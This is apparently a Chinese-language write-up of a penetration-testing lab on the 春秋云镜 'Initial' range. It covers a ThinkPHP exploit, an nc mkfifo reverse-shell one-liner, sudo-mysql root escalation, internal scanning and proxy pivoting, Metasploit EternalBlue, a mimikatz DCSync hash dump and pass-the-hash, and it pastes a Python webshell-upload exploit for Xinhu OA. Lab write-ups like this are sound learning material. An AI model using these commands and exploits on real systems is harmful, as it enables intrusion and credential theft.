春秋云镜 Initial wp
前言
想着要学渗透了。学了点前置知识就来打了,结果中途在配置代理,网络上面花了好久
而且春秋云镜的靶场。。。好贵
记录
扫端口 22 80 25 110
80进去是一共登录页,扫出来是think php,直接拿一把梭工具getShell
[+] 目标存在tp5_construct_code_exec_2漏洞
蚁剑连上去之后想反弹shell,正常语句弹不了,只能用rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f
拿到shell之后想办法提权
suid里面没什么好东西
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/su
/usr/bin/chsh
/usr/bin/stapbpf
/usr/bin/staprun
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/mount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device但是sudo里面有
sudo -l
Matching Defaults entries for www-data on ubuntu-web01:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu-web01:
(root) NOPASSWD: /usr/bin/mysqlmysql的-e选项可以提权
sudo mysql -e '\! /bin/sh'
在root目录下发现flag01
渗透
linux机器上设置好root的密钥登录,转用密钥ssh登上机器
上传fscan开扫(这fscan真的是每扫一次都不一样,给我扫红温了
root@ubuntu-web01:~# ./fscan -h 172.22.1.0/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.1.15 is alive
(icmp) Target 172.22.1.2 is alive
(icmp) Target 172.22.1.18 is alive
(icmp) Target 172.22.1.21 is alive
[*] Icmp alive hosts len is: 4
172.22.1.18:139 open
172.22.1.2:139 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:3306 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:445 open
172.22.1.21:139 open
172.22.1.2:88 open
[*] alive ports len is: 11
start vulscan
[*] NetInfo
[*]172.22.1.21
[->]XIAORANG-WIN7
[->]172.22.1.21
[*] NetInfo
[*]172.22.1.2
[->]DC01
[->]172.22.1.2
[+] MS17-010 172.22.1.21 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetInfo
[*]172.22.1.18
[->]XIAORANG-OA01
[->]172.22.1.18
[*] OsInfo 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.1.2 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[*] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
已完成 11/11
[*] 扫描结束,耗时: 6.087067491s能看到172.22.1.2是域控,最后一个flag应该在里面
注意到[+] MS17-010 172.22.1.21 这个有永恒之蓝漏洞,等下要打
先在linux机器上上传iox,使用socks5模式
然后配置好proxychains,使用proxychains启动msf框架,上线linux主机(这里我用的还是公网的vps,直接反弹的shell,也可以用正向shell),打永恒之蓝
msf6 exploit(multi/handler) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp_uuid
payload => windows/x64/meterpreter/bind_tcp_uuid
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 172.22.1.21
RHOSTS => 172.22.1.21
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit加载mimikatz
meterpreter> load kiwi
拿下凭据
meterpreter > kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt fb812eea13a18b7fcdb8e6d67ddc205b 514
1106 Marcus e07510a4284b3c97c8e7dee970918c5c 512
1107 Charles f6a9881cd5ae709abb4ac9ab87f24617 512
1000 DC01$ 625fd1722a3aa917f16ac890ae610843 532480
500 Administrator 10cf89a850fb1cdbe6bb432b859164c8512
1104 XIAORANG-OA01$ 6011d85791f965aa3426f6636047a2934096
1108 XIAORANG-WIN7$ f5e265db883e025c263de53053ace2984096但是在这台主机里面没发现有flag,而且因为是在乌班图装的msf,有点问题没法用shell,后面转kali了
通过凭据打哈希传递,拿到flag03
还有个172.22.1.18 是信呼OA,弱密码admin/admin123进去直接打cve就行
这里贴别人的paylaod
# 1.php为webshell
# 需要修改以下内容:
# url_pre = 'http://<IP>/'
# 'adminuser': '<ADMINUSER_BASE64>',
# 'adminpass': '<ADMINPASS_BASE64>',
import requests
session = requests.session()
url_pre = 'http://<IP>/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
# url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=<ID>'
data1 = {
'rempass': '0',
'jmpass': 'false',
'device': '1625884034525',
'ltype': '0',
'adminuser': '<ADMINUSER_BASE64>',
'adminpass': '<ADMINPASS_BASE64>',
'yanzm': ''
}
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
print(filepath)
id = r.json()['id']
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)进去直接就是Administrator 权限,在家目录下找到flag02
结语
打完最后总共花了有四个小时
主要学了怎么用配置代理进内网和使用msf框架
其他的基本是正常web打法
许可协议:
CC BY 4.0